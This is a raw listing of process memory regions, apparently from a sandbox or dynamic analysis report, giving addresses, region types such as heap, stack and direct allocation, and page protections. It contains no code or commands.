page read and write
4E8E000
stack
page read and write
1F3AE570000
heap
page read and write
3390000
direct allocation
page execute and read and write
4E1D000
stack
page read and write
2F0D000
stack
page read and write
6621000
direct allocation
page read and write
33B8000
heap
page read and write
7A4F000
stack
page read and write
346F000
heap
page read and write
2FE4000
heap
page read and write
FA2000
unkown
page readonly
1F3AE3A8000
heap
page read and write
7D8C000
heap
page read and write
40C0000
direct allocation
page execute and read and write
61E9B000
unkown
page read and write
1AE4000
heap
page read and write
3B80000
direct allocation
page execute and read and write
2F2C000
heap
page read and write
4290000
direct allocation
page execute and read and write
309E000
stack
page read and write
301E000
stack
page read and write
7725000
heap
page read and write
34B1000
heap
page read and write
331E000
stack
page read and write
2FE4000
heap
page read and write
520000
heap
page read and write
8460000
trusted library allocation
page read and write
5030000
heap
page read and write
11D0000
heap
page read and write
7F0000
heap
page read and write
4340000
direct allocation
page execute and read and write
3460000
heap
page read and write
2F56000
heap
page read and write
401000
unkown
page execute read
22F8000
direct allocation
page read and write
36C0000
remote allocation
page read and write
2FE4000
heap
page read and write
41C000
stack
page read and write
2DCD000
stack
page read and write
3660000
heap
page read and write
5AD000
unkown
page read and write
3A60000
direct allocation
page execute and read and write
45C000
stack
page read and write
6670000
heap
page read and write
3472000
heap
page read and write
2BE120FD000
heap
page read and write
FF393FE000
unkown
page readonly
3565000
heap
page read and write
8850000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
7D8000
heap
page read and write
5A1000
unkown
page write copy
930000
heap
page read and write
1A8207B000
stack
page read and write
3560000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
106B000
unkown
page readonly
5BEF000
stack
page read and write
9AE0000
trusted library allocation
page read and write
33A4000
heap
page read and write
2FD4000
heap
page read and write
85CB000
direct allocation
page read and write
2434000
direct allocation
page read and write
7FE3C000
direct allocation
page read and write
12BE000
heap
page read and write
7C6000
heap
page read and write
22EA000
direct allocation
page read and write
34D9000
direct allocation
page read and write
7A1000
heap
page read and write
3590000
direct allocation
page execute and read and write
4F7E000
stack
page read and write
39C0000
direct allocation
page execute and read and write
454F000
direct allocation
page read and write
37B0000
direct allocation
page execute and read and write
33A4000
heap
page read and write
2FD4000
heap
page read and write
18DA000
heap
page read and write
2EE8000
trusted library allocation
page read and write
3710000
direct allocation
page execute and read and write
7721000
heap
page read and write
10D000
stack
page read and write
4D21000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
2BE1206F000
heap
page read and write
4CB0000
direct allocation
page read and write
7724000
heap
page read and write
3F30000
direct allocation
page execute and read and write
7810000
trusted library allocation
page read and write
184E000
heap
page read and write
1B25000
heap
page read and write
4170000
direct allocation
page execute and read and write
7FD50000
direct allocation
page read and write
8E000
stack
page read and write
40D0000
direct allocation
page execute and read and write
7784000
heap
page read and write
344F000
stack
page read and write
E60000
heap
page read and write
2329000
heap
page read and write
2C9E000
heap
page read and write
2FD4000
heap
page read and write
4902000
direct allocation
page read and write
34A4000
heap
page read and write
1B25000
heap
page read and write
8ECE000
stack
page read and write
41A0000
direct allocation
page execute and read and write
303C000
stack
page read and write
5F0000
heap
page read and write
2EE3000
heap
page read and write
5880000
trusted library allocation
page execute and read and write
7D73000
heap
page read and write
3486000
heap
page read and write
22BF000
direct allocation
page read and write
7721000
heap
page read and write
54CF000
stack
page read and write
502000
unkown
page write copy
66B1000
heap
page read and write
1295C160000
remote allocation
page read and write
500A000
trusted library allocation
page read and write
311C000
heap
page read and write
7BD000
stack
page read and write
4FF6000
trusted library allocation
page read and write
2AF8000
stack
page read and write
2C10000
heap
page read and write
33F7000
direct allocation
page read and write
2E08000
heap
page read and write
2EEA000
heap
page read and write
87FD000
direct allocation
page read and write
A93E000
stack
page read and write
302E000
stack
page read and write
5AF000
unkown
page write copy
700000
heap
page read and write
980E000
stack
page read and write
44CC000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
31E0000
heap
page read and write
5731000
heap
page read and write
34A2000
heap
page read and write
8460000
trusted library allocation
page read and write
599E000
stack
page read and write
7786000
heap
page read and write
5E0000
heap
page read and write
1ADC000
heap
page read and write
33A4000
heap
page read and write
31AA000
heap
page read and write
33A4000
heap
page read and write
2FD4000
heap
page read and write
34C3000
heap
page read and write
2BE17537000
trusted library allocation
page read and write
3380000
heap
page read and write
1295C160000
remote allocation
page read and write
33A4000
heap
page read and write
914E000
stack
page read and write
33A4000
heap
page read and write
745000
heap
page read and write
34E2000
direct allocation
page read and write
FF38CFE000
unkown
page readonly
5010000
trusted library allocation
page read and write
871C000
direct allocation
page read and write
2FD4000
heap
page read and write
4F5E000
stack
page read and write
5461000
heap
page read and write
3556000
heap
page read and write
1295C1DB000
heap
page read and write
3326000
heap
page read and write
2570000
direct allocation
page read and write
2F80000
heap
page read and write
2A7E000
stack
page read and write
FF390FE000
unkown
page readonly
D11000
unkown
page execute read
1C5A000
heap
page read and write
1066000
unkown
page read and write
938E000
stack
page read and write
5730000
heap
page read and write
2FE4000
heap
page read and write
2FCE000
stack
page read and write
2FE4000
heap
page read and write
1B25000
heap
page read and write
2BE1206B000
heap
page read and write
7734000
heap
page read and write
34AB000
heap
page read and write
2FE4000
heap
page read and write
34DD000
direct allocation
page read and write
1F3AE380000
heap
page read and write
5461000
heap
page read and write
2FD4000
heap
page read and write
303B000
heap
page read and write
1FF66410000
heap
page read and write
39F0000
direct allocation
page execute and read and write
2BE17410000
trusted library allocation
page read and write
1F3AE3A0000
heap
page read and write
3558000
heap
page read and write
1716000
heap
page read and write
EAE000
stack
page read and write
12D5000
heap
page read and write
6F22000
trusted library allocation
page read and write
34E9000
heap
page read and write
73D000
heap
page read and write
41C000
unkown
page readonly
840000
heap
page read and write
2FD4000
heap
page read and write
8A98000
direct allocation
page read and write
F9E000
unkown
page read and write
33A0000
heap
page read and write
66ED000
heap
page read and write
4440000
direct allocation
page execute and read and write
35EF000
stack
page read and write
4ED0000
heap
page read and write
2FE4000
heap
page read and write
799000
heap
page read and write
224B000
direct allocation
page read and write
2FD4000
heap
page read and write
5770000
heap
page read and write
25FE000
stack
page read and write
3750000
direct allocation
page execute and read and write
5B3000
unkown
page read and write
37A0000
direct allocation
page execute and read and write
1142000
trusted library allocation
page read and write
3FF0000
direct allocation
page execute and read and write
33A4000
heap
page read and write
D10000
unkown
page readonly
A73C000
stack
page read and write
4ED000
stack
page read and write
8FF000
stack
page read and write
91B000
heap
page read and write
2FE4000
heap
page read and write
341E000
direct allocation
page execute and read and write
5160000
trusted library allocation
page read and write
2FE4000
heap
page read and write
4EE0000
heap
page read and write
2DBF000
stack
page read and write
3609000
heap
page read and write
3478000
direct allocation
page read and write
3700000
direct allocation
page execute and read and write
5650000
trusted library allocation
page read and write
7721000
heap
page read and write
7723000
heap
page read and write
2DCD000
trusted library allocation
page read and write
2CB0000
heap
page read and write
32C7000
direct allocation
page read and write
36DC000
direct allocation
page read and write
3C30000
direct allocation
page execute and read and write
3559000
heap
page read and write
2BA0000
heap
page read and write
34AC000
direct allocation
page read and write
34EE000
heap
page read and write
7735000
heap
page read and write
8520000
trusted library allocation
page read and write
4390000
direct allocation
page execute and read and write
37FF000
stack
page read and write
1B14000
heap
page read and write
950E000
stack
page read and write
2BE1762D000
heap
page read and write
2BE1291B000
heap
page read and write
2CAA000
heap
page read and write
114B000
trusted library allocation
page execute and read and write
2FD4000
heap
page read and write
2C6F000
stack
page read and write
33A4000
heap
page read and write
8690000
direct allocation
page read and write
1FF662F9000
heap
page read and write
61E88000
unkown
page read and write
129B000
heap
page read and write
3647000
heap
page read and write
9C8000
heap
page read and write
3C14000
heap
page read and write
1B0E000
heap
page read and write
534000
unkown
page readonly
2E00000
heap
page read and write
2FD4000
heap
page read and write
2408000
direct allocation
page read and write
3D80000
direct allocation
page execute and read and write
129C000
heap
page read and write
189F000
heap
page read and write
4DA7000
direct allocation
page read and write
8649000
direct allocation
page read and write
7C3000
heap
page read and write
2BE11F50000
heap
page read and write
7611000
heap
page read and write
3970000
direct allocation
page execute and read and write
240F000
direct allocation
page read and write
B70000
heap
page read and write
918000
heap
page read and write
180000
stack
page read and write
8460000
trusted library allocation
page read and write
863000
unkown
page execute and read and write
35DF000
stack
page read and write
7734000
heap
page read and write
2EDC000
stack
page read and write
7717000
heap
page read and write
34D8000
heap
page read and write
34AE000
heap
page read and write
2440000
direct allocation
page read and write
D70000
heap
page read and write
8460000
trusted library allocation
page read and write
4010000
direct allocation
page execute and read and write
4810000
heap
page read and write
347F000
direct allocation
page read and write
36D0000
heap
page read and write
412000
unkown
page write copy
318E000
stack
page read and write
2BE17448000
trusted library allocation
page read and write
54E000
stack
page read and write
33A4000
heap
page read and write
6DE000
stack
page read and write
2FE4000
heap
page read and write
33A4000
heap
page read and write
2BE12802000
heap
page read and write
1ADF000
stack
page read and write
3653000
heap
page read and write
3850000
direct allocation
page execute and read and write
87FF000
direct allocation
page read and write
33A4000
heap
page read and write
7734000
heap
page read and write
2CBB000
heap
page read and write
778B000
heap
page read and write
33F2000
direct allocation
page read and write
19981FF000
stack
page read and write
FF38E7E000
stack
page read and write
364A000
heap
page read and write
D11000
unkown
page execute read
86A5000
direct allocation
page read and write
93000
stack
page read and write
863B000
direct allocation
page read and write
F9E000
unkown
page write copy
77F1000
heap
page read and write
3540000
heap
page read and write
4EEE000
stack
page read and write
539F000
stack
page read and write
84D0000
trusted library allocation
page read and write
1C59000
heap
page read and write
3440000
heap
page read and write
18A0000
heap
page read and write
3650000
heap
page read and write
F9E000
unkown
page write copy
778A000
heap
page read and write
342F000
direct allocation
page read and write
2C79000
heap
page read and write
7AC4000
heap
page read and write
2733000
direct allocation
page read and write
32D6000
heap
page read and write
7D47000
heap
page read and write
2FE4000
heap
page read and write
412000
unkown
page read and write
1717000
heap
page read and write
2449000
direct allocation
page read and write
2FD4000
heap
page read and write
22CD000
direct allocation
page read and write
8736000
direct allocation
page read and write
2D3F000
stack
page read and write
42B0000
direct allocation
page execute and read and write
6A5F000
stack
page read and write
7AB8000
heap
page read and write
3280000
heap
page read and write
51F0000
trusted library allocation
page execute and read and write
8460000
trusted library allocation
page read and write
3380000
heap
page read and write
7710000
heap
page read and write
3096000
heap
page read and write
7FCA0000
direct allocation
page read and write
400000
unkown
page readonly
19C000
stack
page read and write
4000000
direct allocation
page execute and read and write
FE3000
heap
page read and write
8590000
trusted library allocation
page read and write
1B11000
heap
page read and write
2BE17445000
trusted library allocation
page read and write
2BE17470000
trusted library allocation
page read and write
7734000
heap
page read and write
7710000
trusted library allocation
page read and write
34A2000
heap
page read and write
356F000
stack
page read and write
480F000
stack
page read and write
32F6000
heap
page read and write
8E8000
unkown
page execute and read and write
3950000
direct allocation
page execute and read and write
869B000
direct allocation
page read and write
D10000
unkown
page readonly
888000
unkown
page execute and write copy
CBE000
stack
page read and write
37F0000
direct allocation
page execute and read and write
7D9B000
heap
page read and write
5B6000
unkown
page readonly
329A000
heap
page read and write
2FD4000
heap
page read and write
348E000
heap
page read and write
33A4000
heap
page read and write
3D60000
direct allocation
page execute and read and write
401000
unkown
page execute and read and write
7FDF0000
direct allocation
page read and write
7725000
heap
page read and write
2C7C000
heap
page read and write
8460000
trusted library allocation
page read and write
2BE17518000
trusted library allocation
page read and write
D11000
unkown
page execute read
3484000
heap
page read and write
44A0000
direct allocation
page read and write
2FE4000
heap
page read and write
329C000
stack
page read and write
77F1000
heap
page read and write
88E000
stack
page read and write
12BE000
heap
page read and write
86C0000
direct allocation
page read and write
61E89000
unkown
page read and write
8460000
trusted library allocation
page read and write
3C20000
direct allocation
page execute and read and write
7D71000
heap
page read and write
7130000
trusted library allocation
page read and write
2BE17460000
trusted library allocation
page read and write
3446000
direct allocation
page read and write
FF3907E000
stack
page read and write
12D7000
heap
page read and write
2BE174A2000
trusted library allocation
page read and write
2FD4000
heap
page read and write
1717000
heap
page read and write
349C000
direct allocation
page read and write
3291000
heap
page read and write
37E0000
direct allocation
page execute and read and write
8B13000
direct allocation
page read and write
778B000
heap
page read and write
F3E000
heap
page read and write
708000
heap
page read and write
3420000
heap
page read and write
1AE3000
heap
page read and write
2E14000
trusted library allocation
page read and write
330E000
stack
page read and write
2FD4000
heap
page read and write
7734000
heap
page read and write
3454000
direct allocation
page read and write
349C000
heap
page read and write
739000
heap
page read and write
2FE4000
heap
page read and write
2BE174D0000
trusted library allocation
page read and write
22D8000
direct allocation
page read and write
6B9F000
stack
page read and write
3313000
direct allocation
page read and write
16F0000
direct allocation
page read and write
2B60000
heap
page read and write
2FE4000
heap
page read and write
87E2000
direct allocation
page read and write
2F7D000
stack
page read and write
2FD4000
heap
page read and write
2BE174BE000
trusted library allocation
page read and write
FF37E7B000
stack
page read and write
12D5000
heap
page read and write
1B0E000
heap
page read and write
7FE38000
direct allocation
page read and write
5670000
heap
page read and write
3460000
heap
page read and write
8480000
trusted library allocation
page read and write
1B1A000
heap
page read and write
95CF000
stack
page read and write
8460000
trusted library allocation
page read and write
36D0000
direct allocation
page execute and read and write
32CC000
heap
page read and write
52D000
stack
page read and write
8460000
trusted library allocation
page read and write
500A000
trusted library allocation
page read and write
9C0000
heap
page read and write
868C000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
4A8E000
stack
page read and write
3E90000
direct allocation
page execute and read and write
4BB0000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
8490000
trusted library allocation
page read and write
51D2000
trusted library allocation
page read and write
12E1000
heap
page read and write
16F0000
heap
page read and write
500E000
trusted library allocation
page read and write
4574000
direct allocation
page read and write
2BE1754A000
trusted library allocation
page read and write
7C7000
heap
page read and write
15FD000
stack
page read and write
5D2C000
stack
page read and write
33A4000
heap
page read and write
8610000
direct allocation
page read and write
2EE9000
heap
page read and write
FA2000
unkown
page readonly
12A3000
heap
page read and write
7D0000
heap
page read and write
3484000
heap
page read and write
6CC1000
direct allocation
page read and write
7FE000
heap
page read and write
18CB000
heap
page read and write
7FD5E000
direct allocation
page read and write
8A60000
direct allocation
page read and write
4430000
direct allocation
page execute and read and write
7FE00000
direct allocation
page read and write
3EB0000
direct allocation
page execute and read and write
7FE15000
direct allocation
page read and write
2976000
heap
page read and write
2FE6000
heap
page read and write
2BE11F80000
trusted library allocation
page read and write
7610000
heap
page read and write
1A820FF000
stack
page read and write
61E98000
unkown
page read and write
3610000
direct allocation
page execute and read and write
6C21000
direct allocation
page read and write
2491000
direct allocation
page read and write
3E40000
direct allocation
page execute and read and write
2DF8000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
1997D1C000
stack
page read and write
227B000
direct allocation
page read and write
3561000
heap
page read and write
7710000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
690000
heap
page read and write
1090000
heap
page read and write
3B60000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
4240000
direct allocation
page execute and read and write
2CAA000
heap
page read and write
7810000
trusted library allocation
page read and write
349D000
heap
page read and write
E30000
heap
page read and write
12BE000
heap
page read and write
321B000
heap
page read and write
2BE17570000
trusted library allocation
page read and write
355A000
heap
page read and write
1892000
heap
page read and write
33A4000
heap
page read and write
1FF665A4000
heap
page read and write
8460000
trusted library allocation
page read and write
1130000
trusted library allocation
page read and write
8CB000
heap
page read and write
FF38F7E000
stack
page read and write
7F8000
heap
page read and write
2530000
heap
page read and write
2BE12E80000
trusted library section
page readonly
2E6C000
stack
page read and write
61E8A000
unkown
page readonly
3448000
heap
page read and write
33A4000
heap
page read and write
910E000
stack
page read and write
2BE176F0000
heap
page read and write
18C000
stack
page read and write
3CA0000
direct allocation
page execute and read and write
39E0000
direct allocation
page execute and read and write
32F6000
heap
page read and write
3F50000
direct allocation
page execute and read and write
84E0000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
3406000
direct allocation
page execute and read and write
33A4000
heap
page read and write
1295C1BE000
heap
page read and write
2B30000
trusted library allocation
page execute and read and write
66E6000
heap
page read and write
33A4000
heap
page read and write
8460000
trusted library allocation
page read and write
12A4000
heap
page read and write
4548000
direct allocation
page read and write
7FDE0000
direct allocation
page read and write
1295C1BE000
heap
page read and write
354E000
stack
page read and write
3A20000
direct allocation
page execute and read and write
34A2000
heap
page read and write
3D40000
direct allocation
page execute and read and write
570E000
stack
page read and write
886000
unkown
page execute and read and write
2FE4000
heap
page read and write
A10000
heap
page read and write
2CB5000
heap
page read and write
11F0000
heap
page read and write
3691000
heap
page read and write
9FE000
stack
page read and write
1295C206000
heap
page read and write
F57000
heap
page read and write
3450000
heap
page read and write
33A4000
heap
page read and write
B6E000
stack
page read and write
33A4000
heap
page read and write
1C68000
heap
page read and write
977E000
stack
page read and write
7AB000
heap
page read and write
397E000
stack
page read and write
23DB000
direct allocation
page read and write
1AE3000
heap
page read and write
3C19000
heap
page read and write
33A4000
heap
page read and write
2B80000
heap
page read and write
513000
unkown
page readonly
3A40000
direct allocation
page execute and read and write
86C2000
direct allocation
page read and write
33D4000
direct allocation
page execute and read and write
7C8000
heap
page read and write
3370000
heap
page read and write
97BD000
stack
page read and write
8704000
direct allocation
page read and write
180000
heap
page read and write
12D5000
heap
page read and write
2F45000
heap
page read and write
38B0000
direct allocation
page execute and read and write
3830000
direct allocation
page execute and read and write
3460000
direct allocation
page read and write
3DB0000
direct allocation
page execute and read and write
2CC1000
heap
page read and write
226C000
direct allocation
page read and write
21C3000
direct allocation
page read and write
1B0E000
heap
page read and write
2FD4000
heap
page read and write
66DE000
stack
page read and write
3650000
direct allocation
page execute and read and write
77F1000
heap
page read and write
3649000
heap
page read and write
4020000
direct allocation
page execute and read and write
2FD4000
heap
page read and write
400000
unkown
page readonly
8460000
trusted library allocation
page read and write
33A4000
heap
page read and write
66F0000
heap
page read and write
32DC000
heap
page read and write
1AEC000
heap
page read and write
360F000
stack
page read and write
3417000
direct allocation
page execute and read and write
2FD4000
heap
page read and write
3A70000
direct allocation
page execute and read and write
8CD0000
direct allocation
page read and write
2D80000
heap
page read and write
321F000
heap
page read and write
9EA000
unkown
page execute and read and write
3554000
heap
page read and write
1147000
trusted library allocation
page execute and read and write
3B40000
direct allocation
page execute and read and write
68B0000
trusted library allocation
page read and write
2CBB000
heap
page read and write
2FD4000
heap
page read and write
5180000
trusted library allocation
page read and write
DFE000
stack
page read and write
774F000
stack
page read and write
1B1B000
heap
page read and write
31CF000
stack
page read and write
3110000
heap
page read and write
12BE9AE4000
heap
page read and write
2FD4000
heap
page read and write
33B5000
heap
page read and write
8480000
trusted library allocation
page read and write
1ABEB0E000
stack
page read and write
696000
heap
page read and write
7FD70000
direct allocation
page read and write
3B30000
direct allocation
page execute and read and write
FF395FB000
stack
page read and write
8CE000
heap
page read and write
55BD000
stack
page read and write
A6FE000
stack
page read and write
346F000
stack
page read and write
2BAE000
stack
page read and write
34D8000
heap
page read and write
7724000
heap
page read and write
2BE17515000
trusted library allocation
page read and write
33F0000
heap
page read and write
FF398FE000
unkown
page readonly
3F10000
direct allocation
page execute and read and write
71E000
stack
page read and write
2B40000
heap
page execute and read and write
34AA000
heap
page read and write
1295C1ED000
heap
page read and write
2F78000
heap
page read and write
86F4000
direct allocation
page read and write
B40000
heap
page read and write
19B000
stack
page read and write
21A0000
direct allocation
page read and write
2FE4000
heap
page read and write
33A4000
heap
page read and write
2BE1749F000
trusted library allocation
page read and write
960E000
stack
page read and write
FA2000
unkown
page readonly
3560000
heap
page read and write
2BE1202B000
heap
page read and write
22C3000
direct allocation
page read and write
2CBC000
heap
page read and write
2CE0000
heap
page read and write
778D000
heap
page read and write
2CB1000
heap
page read and write
3565000
heap
page read and write
3D10000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
2F2C000
heap
page read and write
3D20000
direct allocation
page execute and read and write
970F000
stack
page read and write
4DDD000
direct allocation
page read and write
355F000
heap
page read and write
4D2B000
direct allocation
page read and write
2BBE000
trusted library allocation
page read and write
7617000
heap
page read and write
F13000
trusted library allocation
page execute and read and write
3810000
direct allocation
page execute and read and write
45C3000
direct allocation
page read and write
3472000
heap
page read and write
35B0000
heap
page read and write
3FA0000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
106B000
unkown
page readonly
8460000
trusted library allocation
page read and write
2FD4000
heap
page read and write
106B000
unkown
page readonly
4FF0000
trusted library allocation
page read and write
33A4000
heap
page read and write
1067000
unkown
page write copy
34A5000
heap
page read and write
7810000
trusted library allocation
page read and write
8480000
trusted library allocation
page read and write
33A4000
heap
page read and write
170000
heap
page read and write
184B000
heap
page read and write
1295C1C2000
heap
page read and write
3AB0000
direct allocation
page execute and read and write
50A000
unkown
page read and write
75F000
heap
page read and write
5008000
trusted library allocation
page read and write
CC0000
heap
page read and write
2CB1000
heap
page read and write
2FD4000
heap
page read and write
11E0000
heap
page read and write
36E3000
direct allocation
page read and write
2FD4000
heap
page read and write
9B000
stack
page read and write
FA2000
unkown
page readonly
D5E000
stack
page read and write
22D4000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
1B11000
heap
page read and write
22B0000
direct allocation
page read and write
31B0000
direct allocation
page read and write
1B21000
heap
page read and write
7735000
heap
page read and write
980000
heap
page read and write
1136000
trusted library allocation
page execute and read and write
1B25000
heap
page read and write
3BC0000
direct allocation
page execute and read and write
11E7000
heap
page read and write
3620000
heap
page read and write
7611000
heap
page read and write
4090000
direct allocation
page execute and read and write
311E000
stack
page read and write
2BE173A0000
trusted library allocation
page read and write
3303000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
1ADB000
heap
page read and write
5B0000
heap
page read and write
2FE4000
heap
page read and write
8B49000
direct allocation
page read and write
3494000
heap
page read and write
8480000
trusted library allocation
page read and write
3238000
stack
page read and write
7B3000
heap
page read and write
3770000
heap
page read and write
8480000
trusted library allocation
page read and write
7FE40000
direct allocation
page read and write
2BE17600000
heap
page read and write
2BE1770F000
heap
page read and write
18CE000
heap
page read and write
1FF66210000
heap
page read and write
2F0F000
stack
page read and write
2BE17420000
trusted library allocation
page read and write
2CFE000
stack
page read and write
2BE1752F000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
90E000
stack
page read and write
2BE127D1000
trusted library allocation
page read and write
106B000
unkown
page readonly
8460000
trusted library allocation
page read and write
FF387FE000
unkown
page readonly
2FF0000
heap
page read and write
3840000
direct allocation
page execute and read and write
3880000
direct allocation
page execute and read and write
2BE12092000
heap
page read and write
942000
unkown
page readonly
33A4000
heap
page read and write
128F000
stack
page read and write
1066000
unkown
page write copy
2325000
heap
page read and write
12D8000
heap
page read and write
8150000
trusted library allocation
page read and write
43F0000
direct allocation
page execute and read and write
1180000
heap
page read and write
871E000
direct allocation
page read and write
50AE000
stack
page read and write
2FE4000
heap
page read and write
1B0B000
heap
page read and write
3BD0000
direct allocation
page execute and read and write
7721000
heap
page read and write
8460000
trusted library allocation
page read and write
7784000
heap
page read and write
11DA000
heap
page read and write
2BE12043000
heap
page read and write
2FD4000
heap
page read and write
2C70000
heap
page read and write
294E000
stack
page read and write
ABF000
stack
page read and write
1C6D000
heap
page read and write
5012000
trusted library allocation
page read and write
2466000
direct allocation
page read and write
239F000
direct allocation
page read and write
2FE4000
heap
page read and write
8AF7000
direct allocation
page read and write
32B5000
heap
page read and write
3320000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
34A8000
heap
page read and write
8460000
trusted library allocation
page read and write
2BE0000
trusted library allocation
page read and write
331E000
direct allocation
page read and write
B30000
heap
page read and write
778E000
stack
page read and write
32C5000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
41D0000
direct allocation
page execute and read and write
7721000
heap
page read and write
11D0000
heap
page read and write
2BE1208B000
heap
page read and write
247C000
direct allocation
page read and write
29BF000
stack
page read and write
4FF0000
trusted library allocation
page read and write
1C60000
heap
page read and write
2BE17431000
trusted library allocation
page read and write
2FE4000
heap
page read and write
2748000
direct allocation
page read and write
57DF000
heap
page read and write
3EC0000
direct allocation
page execute and read and write
2FD4000
heap
page read and write
4BD000
stack
page read and write
2FE4000
heap
page read and write
1666000
unkown
page execute and write copy
348D000
heap
page read and write
1B1B000
heap
page read and write
1B27000
heap
page read and write
1295C3E4000
heap
page read and write
32B5000
heap
page read and write
5B8000
heap
page read and write
33A4000
heap
page read and write
3178000
heap
page read and write
7D59000
heap
page read and write
7DE2000
heap
page read and write
2BE17524000
trusted library allocation
page read and write
3C17000
heap
page read and write
A6B000
unkown
page execute and read and write
61E99000
unkown
page readonly
906000
heap
page read and write
7B1C000
heap
page read and write
3CD0000
direct allocation
page execute and read and write
7FDCE000
direct allocation
page read and write
7B5000
heap
page read and write
1B25000
heap
page read and write
9D3000
unkown
page execute and read and write
1B2B000
heap
page read and write
3151000
heap
page read and write
795000
heap
page read and write
FF38C7E000
stack
page read and write
3468000
heap
page read and write
6DE000
stack
page read and write
4220000
direct allocation
page execute and read and write
276C000
direct allocation
page read and write
111C000
stack
page read and write
F2D000
trusted library allocation
page execute and read and write
7FDF8000
direct allocation
page read and write
34AB000
heap
page read and write
B20000
heap
page read and write
3190000
heap
page read and write
1AF4000
heap
page read and write
163E000
stack
page read and write
3770000
heap
page read and write
3920000
direct allocation
page execute and read and write
2FD4000
heap
page read and write
1AD9000
heap
page read and write
8806000
direct allocation
page read and write
8E8F000
stack
page read and write
87D4000
direct allocation
page read and write
663E000
direct allocation
page read and write
34D8000
heap
page read and write
2CBB000
heap
page read and write
33A4000
heap
page read and write
1B21000
heap
page read and write
318F000
heap
page read and write
4380000
direct allocation
page execute and read and write
2EAC000
stack
page read and write
3468000
heap
page read and write
32E3000
direct allocation
page read and write
2FD0000
heap
page read and write
2C9E000
heap
page read and write
11AE000
stack
page read and write
FF386FC000
stack
page read and write
7735000
heap
page read and write
36E0000
direct allocation
page execute and read and write
33A4000
heap
page read and write
30E0000
heap
page read and write
245F000
direct allocation
page read and write
1DE000
stack
page read and write
1AFE000
heap
page read and write
12A3000
heap
page read and write
326F000
stack
page read and write
2BE17494000
trusted library allocation
page read and write
3F90000
direct allocation
page execute and read and write
1559000
heap
page read and write
8B3A000
direct allocation
page read and write
1B11000
heap
page read and write
3495000
heap
page read and write
1C55000
heap
page read and write
778A000
heap
page read and write
7DD0000
heap
page read and write
2FD4000
heap
page read and write
3325000
direct allocation
page read and write
22CA000
direct allocation
page read and write
6F00000
trusted library allocation
page read and write
5014000
trusted library allocation
page read and write
1640000
heap
page read and write
419000
unkown
page write copy
3CB0000
direct allocation
page execute and read and write
3350000
direct allocation
page read and write
129C000
heap
page read and write
2458000
direct allocation
page read and write
3E70000
direct allocation
page execute and read and write
2CB1000
heap
page read and write
3A90000
direct allocation
page execute and read and write
8150000
trusted library allocation
page read and write
CF6000
heap
page read and write
1061000
unkown
page read and write
8150000
trusted library allocation
page read and write
4400000
direct allocation
page execute and read and write
8620000
direct allocation
page read and write
33A4000
heap
page read and write
CD000
stack
page read and write
2FE4000
heap
page read and write
2C9E000
heap
page read and write
3370000
direct allocation
page execute and read and write
2BE1208D000
heap
page read and write
7725000
heap
page read and write
106A000
unkown
page write copy
7721000
heap
page read and write
778B000
heap
page read and write
182E000
stack
page read and write
1909000
heap
page read and write
11AE000
stack
page read and write
3F20000
direct allocation
page execute and read and write
691F000
stack
page read and write
8460000
trusted library allocation
page read and write
33A4000
heap
page read and write
16D0000
heap
page read and write
F1D000
trusted library allocation
page execute and read and write
5C0000
heap
page read and write
2724000
direct allocation
page read and write
3299000
heap
page read and write
32BB000
direct allocation
page read and write
2FD4000
heap
page read and write
4230000
direct allocation
page execute and read and write
5014000
trusted library allocation
page read and write
6BBA000
direct allocation
page read and write
8370000
direct allocation
page execute and read and write
2EE2000
trusted library allocation
page read and write
4D08000
direct allocation
page read and write
4501000
direct allocation
page read and write
2BE175D0000
remote allocation
page read and write
8B11000
direct allocation
page read and write
2FE4000
heap
page read and write
8460000
trusted library allocation
page read and write
44A0000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
2450000
direct allocation
page read and write
C00000
heap
page read and write
7FD2E000
direct allocation
page read and write
2BE17700000
heap
page read and write
3295000
heap
page read and write
39A0000
direct allocation
page execute and read and write
778B000
heap
page read and write
929000
unkown
page execute and read and write
2BE174D3000
trusted library allocation
page read and write
7611000
heap
page read and write
7734000
heap
page read and write
33C1000
direct allocation
page execute and read and write
4DD0000
direct allocation
page read and write
5A1000
unkown
page read and write
3760000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
562F000
stack
page read and write
2FCC000
heap
page read and write
3870000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
84E0000
trusted library allocation
page read and write
4FF0000
trusted library allocation
page read and write
3330000
direct allocation
page execute and read and write
1B0A000
heap
page read and write
7710000
trusted library allocation
page read and write
5014000
trusted library allocation
page read and write
33A4000
heap
page read and write
7FC50000
direct allocation
page read and write
1FF665A0000
heap
page read and write
2BE175D0000
remote allocation
page read and write
35F0000
direct allocation
page execute and read and write
34AC000
direct allocation
page read and write
954E000
stack
page read and write
778B000
heap
page read and write
4130000
direct allocation
page execute and read and write
1295C21F000
heap
page read and write
98E000
stack
page read and write
5460000
heap
page read and write
1AF3000
heap
page read and write
A4F000
stack
page read and write
3489000
heap
page read and write
A86000
unkown
page execute and write copy
778C000
heap
page read and write
2BE12800000
heap
page read and write
30CE000
stack
page read and write
2EE6000
trusted library allocation
page read and write
3490000
heap
page read and write
51E3000
heap
page execute and read and write
16B0000
heap
page read and write
958000
unkown
page readonly
6D0000
heap
page read and write
3C00000
direct allocation
page execute and read and write
A2E0000
trusted library allocation
page read and write
2CA4000
heap
page read and write
4300000
direct allocation
page execute and read and write
329C000
heap
page read and write
7AF2000
heap
page read and write
4450000
direct allocation
page execute and read and write
C9C000
stack
page read and write
1B1B000
heap
page read and write
7810000
trusted library allocation
page read and write
78CD000
stack
page read and write
56B0000
heap
page read and write
33A4000
heap
page read and write
85A6000
direct allocation
page read and write
